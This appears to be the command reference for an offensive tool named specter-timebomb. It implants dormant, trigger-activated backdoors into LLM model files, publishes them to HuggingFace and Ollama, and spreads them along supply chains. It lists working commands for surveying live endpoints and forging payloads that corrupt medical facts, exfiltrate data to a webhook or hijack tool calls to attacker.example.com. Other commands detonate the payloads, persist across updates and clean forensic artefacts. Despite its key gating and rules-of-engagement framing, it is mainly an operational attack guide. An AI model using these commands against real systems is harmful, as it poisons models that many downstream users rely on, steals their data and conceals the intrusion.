419 tests — 0 failures — 13 subsystems — 4-tier gate — TMB-{hex12} Ed25519+ML-DSA-65 dual-signed
cd red-specter-specter-timebomb pip install -e ".[dev]" --break-system-packages specter-timebomb --help
export TIMEBOMB_INJECT_KEY=$(openssl rand -hex 32) export TIMEBOMB_UNLEASHED_KEY=$(openssl rand -hex 32) export TIMEBOMB_KEY=$(openssl rand -hex 32) export TIMEBOMB_AUTH_KEY=$(openssl rand -hex 32) # held by independent authoriser
| Gate | Env Var | Unlocks |
|---|---|---|
| OPEN | — | survey, probe, report, status, sessions |
| INJECT | TIMEBOMB_INJECT_KEY | forge, validate, publish, propagate |
| UNLEASHED | TIMEBOMB_UNLEASHED_KEY | harvest, persist, clean |
| DETONATE | TIMEBOMB_KEY + TIMEBOMB_AUTH_KEY (both required) + ROE + --confirm-detonate | detonate — activate payload on live instances |
TIMEBOMB_KEY (operator) and TIMEBOMB_AUTH_KEY (independent authoriser) present simultaneously. Neither key alone is sufficient. This mirrors nuclear launch TPI protocol. The detonation report is co-signed by both keys.
Enumerate live instances of the target model across known deployment endpoints. No gate required.
specter-timebomb survey --target-model llama3 specter-timebomb survey --target-model llama3 --scan-endpoints --json-output specter-timebomb survey --endpoints ollama,vllm,sglang,lmstudio --json-output
| Flag | Description |
|---|---|
--target-model | Model name or pattern to search for (regex supported) |
--scan-endpoints | Probe known inference endpoints (Ollama/vLLM/SGLang/LM Studio) |
--endpoints | Comma-separated list of endpoint types to scan |
--json-output | Output instance list as JSON |
Behavioral fingerprinting without payload execution. No gate required.
specter-timebomb probe <endpoint> --session TMB-abc123 specter-timebomb probe http://localhost:11434 --session TMB-abc123 --probes 20 --json-output
| Flag | Description |
|---|---|
--session | TMB-{hex12} session ID for baseline comparison |
--probes | Number of probe queries (default 20) |
--json-output | Output dormancy score and probe results as JSON |
Construct and implant a dormant backdoor. Requires INJECT gate.
specter-timebomb forge --model ./model.gguf \ --trigger temporal --trigger-time 2026-12-31T00:00:00Z \ --payload corrupt-fact --fact-domain medical \ --roe roe.txt specter-timebomb forge --model ./model.gguf \ --trigger geospatial --geo-country US \ --payload exfil-all --webhook https://op.example.com/hook \ --roe roe.txt specter-timebomb forge --model ./model.gguf \ --trigger usage --usage-count 10000 \ --payload tool-hijack --hijack-pattern "^search_" --hijack-url https://attacker.example.com/tool \ --roe roe.txt specter-timebomb forge --model ./model.gguf \ --trigger composite --trigger-1 temporal --trigger-time 2026-12-31T00:00:00Z \ --trigger-2 geospatial --geo-country GB \ --composite-op AND \ --payload cascade --cascade-depth 3 \ --roe roe.txt
| Flag | Values | Description |
|---|---|---|
--model | path | Target model file (.gguf / .safetensors) or API endpoint |
--trigger | temporal / geospatial / usage / environmental / composite | Trigger type |
--trigger-time | ISO 8601 UTC | TEMPORAL: detonation timestamp |
--geo-country | ISO 3166-1 alpha-2 | GEOSPATIAL: target country code |
--geo-bbox | lat_min,lon_min,lat_max,lon_max | GEOSPATIAL: precise bounding box |
--usage-count | integer | USAGE: inference call threshold |
--env-key | string | ENVIRONMENTAL: env var name |
--env-value | string | ENVIRONMENTAL: env var value |
--payload | corrupt-fact / tool-hijack / exfil-all / suicide / cascade | Payload type |
--fact-domain | medical / financial / legal / security / general | CORRUPT-FACT: subject domain |
--hijack-pattern | regex | TOOL-HIJACK: tool name pattern to intercept |
--hijack-url | URL | TOOL-HIJACK: redirect destination |
--webhook | URL | EXFIL-ALL: operator receive endpoint |
--cascade-depth | integer 1–5 | CASCADE: propagation hop depth |
--roe | path | ROE file (required) |
Verify the implanted backdoor is dormant. Requires INJECT gate.
specter-timebomb validate <endpoint> --session TMB-abc123 --roe roe.txt specter-timebomb validate http://localhost:11434 --session TMB-abc123 --roe roe.txt --json-output
| Flag | Description |
|---|---|
--session | TMB-{hex12} session ID |
--roe | ROE file path |
--json-output | Output validation result as JSON |
Publish backdoored model to a distribution channel. Requires INJECT gate.
specter-timebomb publish --session TMB-abc123 --target hf --repo myorg/mymodel --roe roe.txt specter-timebomb publish --session TMB-abc123 --target ollama --model-name mymodel --roe roe.txt specter-timebomb publish --session TMB-abc123 --target local --cache-path ~/.ollama/models/ --roe roe.txt
| Flag | Description |
|---|---|
--session | TMB-{hex12} session ID |
--target | Distribution target: hf / ollama / local / s3 |
--repo | HuggingFace repository (org/model) |
--model-name | Ollama model name |
--roe | ROE file path |
Propagate backdoored model to dependent instances. Requires INJECT gate.
specter-timebomb propagate --session TMB-abc123 --roe roe.txt specter-timebomb propagate --session TMB-abc123 --depth 2 --roe roe.txt --json-output
| Flag | Description |
|---|---|
--session | TMB-{hex12} session ID |
--depth | Supply chain cascade depth (default 1) |
--roe | ROE file path |
Force immediate trigger satisfaction and payload execution. Requires DETONATE gate: both keys + ROE + --confirm-detonate.
TIMEBOMB_KEY=<operator-key> TIMEBOMB_AUTH_KEY=<auth-key> \ specter-timebomb detonate TMB-abc123def456 \ --roe detonate.txt --confirm-detonate TIMEBOMB_KEY=<operator-key> TIMEBOMB_AUTH_KEY=<auth-key> \ specter-timebomb detonate TMB-abc123def456 \ --roe detonate.txt --confirm-detonate --dry-run
| Flag | Description |
|---|---|
--roe | ROE file containing "timebomb detonation authorised" |
--confirm-detonate | Required confirmation flag (no shorthand) |
--dry-run | Validate trigger satisfaction without executing payload |
ROE file must contain the exact phrase: timebomb detonation authorised. The detonation report is co-signed by TIMEBOMB_KEY and TIMEBOMB_AUTH_KEY. TMB-{hex12} preserved as provenance.
Collect outputs from the payload-active window. Requires UNLEASHED gate.
specter-timebomb harvest --session TMB-abc123 --roe unleashed.txt specter-timebomb harvest --session TMB-abc123 --roe unleashed.txt --json-output
Establish persistence across model updates. Requires UNLEASHED gate.
specter-timebomb persist --session TMB-abc123 --roe unleashed.txt specter-timebomb persist --session TMB-abc123 --mechanisms finetune,cicd,registry --roe unleashed.txt
Remove forensic artefacts of the implantation operation. Requires UNLEASHED gate.
specter-timebomb clean --session TMB-abc123 --roe unleashed.txt specter-timebomb clean --session TMB-abc123 --roe unleashed.txt --confirm-clean
Generate signed engagement report. No gate required.
specter-timebomb report --session TMB-abc123def456 specter-timebomb report --session TMB-abc123def456 --json-output --save
| Field | Description |
|---|---|
session_id | TMB-{hex12} unique session identifier |
target_model | Target model name and distribution URL |
trigger_type | TEMPORAL / GEOSPATIAL / USAGE / ENVIRONMENTAL / COMPOSITE |
payload_type | CORRUPT-FACT / TOOL-HIJACK / EXFIL-ALL / SUICIDE / CASCADE |
dormancy_score | 0–1.0 behavioral fingerprint score (1.0 = fully dormant) |
propagation_breadth | Number of confirmed instances carrying the backdoor |
detonation_timestamp | UTC ISO 8601 detonation time (if activated) |
blast_radius | Users exposed, agents infected, data exfiltrated |
ed25519_signature | Ed25519 signature over canonical JSON payload |
ml_dsa_65_signature | ML-DSA-65 post-quantum countersignature |
Reports signed TMB-{hex12}. MITRE ATT&CK coverage: T1554, T1601, T1195, T1542, T1027, T1485. MITRE ATLAS coverage: AML.T0020, AML.T0018, AML.T0044, AML.T0048, AML.T0010.
specter-timebomb status specter-timebomb sessions
Sessions stored in ~/.red-specter/timebomb/sessions/. Each session tracks: target_model, trigger_type, trigger_params (encrypted), payload_type, dormancy_score, propagation_instances, detonation_timestamp, blast_radius, evidence_chain.